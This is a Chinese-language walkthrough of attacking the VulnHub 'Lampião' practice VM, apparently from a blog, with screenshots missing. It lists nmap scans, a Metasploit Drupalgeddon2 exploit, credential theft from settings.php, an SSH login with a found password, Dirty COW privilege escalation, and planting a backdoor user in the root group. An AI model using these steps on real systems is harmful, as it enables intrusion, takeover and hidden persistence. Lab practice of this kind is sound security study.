Lampião靶机渗透

一、镜像下载

  1. Lampião: 1 ~ VulnHub
  2. https://download.vulnhub.com/lampiao/Lampiao.zip

3、VM 镜像文件打开

4、将虚拟机适配器设置为NAT模式

二、信息搜集

1、kali扫描靶机IP地址

arp-scan -l

Lampião靶机渗透_第1张图片

2、nmap搜集该主机开放的端口

nmap -sS -T4 -P 1-65535 -v 192.168.245.129

Lampião靶机渗透_第2张图片

80端口是一个静态页面。没有什么太多信息

Lampião靶机渗透_第3张图片

3、端口碰撞 扫描出1098端口

nmap 192.168.245.129 -Pn -p 3

Lampião靶机渗透_第4张图片

nmap - sS - sV -A -v -p- -T5 192.168.245.129

Lampião靶机渗透_第5张图片

4、找到web服务

5、发现drupal,利用漏洞
通过开放的1898端口进入网站,看到目标网站,发现网站cms是drupal

Lampião靶机渗透_第6张图片

# msf 搜索drupal漏洞,使用可利用漏洞进行攻击

>search drupal

# exploit/unix/webapp/drupal_drupalgeddon2

>use 1

>set rhosts 192.168.245.129

>set rport 1898

>run

Lampião靶机渗透_第7张图片

问题:

Lampião靶机渗透_第8张图片

6、继续信息搜集

kali扫描网站目录

dirb http://192.168.245.129:1898/

Lampião靶机渗透_第9张图片

大量配置信息显示

 

Lampião靶机渗透_第10张图片

Lampião靶机渗透_第11张图片

1、测试网页进行弱口令爆破--失败

Lampião靶机渗透_第12张图片

2、登陆框SQL注入---失败

Lampião靶机渗透_第13张图片

3、xss跨站脚本攻击测试

Lampião靶机渗透_第14张图片

4、 检查网页,发下下图两处能点击:

Lampião靶机渗透_第15张图片

 

Lampião靶机渗透_第16张图片

 

Lampião靶机渗透_第17张图片

观察在node/3中有一个音频文件和一句话“Node 2 is not working”

先打开音频文件听一下,没有发现有用信息。

将node/3改为node/2试一下:

三、利用msfconsole工具攻击建立会话

Lampião靶机渗透_第18张图片

python -c 'import pty; pty.spawn("/bin/bash")'

shell

Lampião靶机渗透_第19张图片

四、提权

信息搜集

Lampião靶机渗透_第20张图片

查找网站数据库的配置文件,在/var/www/html/sites/default/settings.php中找到了配置信息!!!

Lampião靶机渗透_第21张图片

远程连接

ssh [email protected]
password:Virgulino

Lampião靶机渗透_第22张图片

查看内核版本

uname -a

脏牛提权

searchsploit dirty

Lampião靶机渗透_第23张图片

xp: GitHub - gbonacini/CVE-2016-5195: A CVE-2016-5195 exploit example.

将木马文件上传至服务器

进入文件目录 cd /tmp/CVE-2016-5195-master

make编译

./dcow -s1

Lampião靶机渗透_第24张图片

后门:

创建用户

useradd Monster

将用户加入到管理组

usermod -g root Monster

Lampião靶机渗透_第25张图片

修改root账户密码

passwd root

passwd Monster

Lampião靶机渗透_第26张图片

你可能感兴趣的:(linux,运维,服务器)